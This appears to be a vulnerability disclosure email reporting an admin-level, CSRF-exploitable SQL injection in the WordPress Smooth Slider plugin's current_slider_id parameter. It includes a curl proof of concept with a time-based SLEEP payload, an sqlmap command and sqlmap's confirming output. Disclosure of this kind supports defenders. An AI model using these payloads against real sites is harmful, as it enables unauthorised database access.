Hello,

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (smooth_slider_create_multiple_sliders())

Method: POST

Vulnerable parameter: current_slider_id

Example PHP callstack:

smooth_slider_create_multiple_sliders [/smooth-slider/settings/sliders.php:77]

wpdb::query

Verification:

curl --cookie "..." --data "rename_slider=Rename&rename_slider_to=x&current_slider_id=-1 or (SELECT * FROM (SELECT SLEEP(5))X)" http://localhost/wp-admin/admin.php?page=smooth-slider-admin

or:

sqlmap --cookie "..." --data "rename_slider=Rename&rename_slider_to=x&current_slider_id=-1" -p current_slider_id --dbms mysql -u http://localhost/wp-admin/admin.php?page=smooth-slider-admin

...

Parameter: current_slider_id (POST)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: rename_slider=Rename&rename_slider_to=x&current_slider_id=-1 AND (SELECT * FROM (SELECT(SLEEP(5)))lpBu)

...

Regards,
Marcin Probola,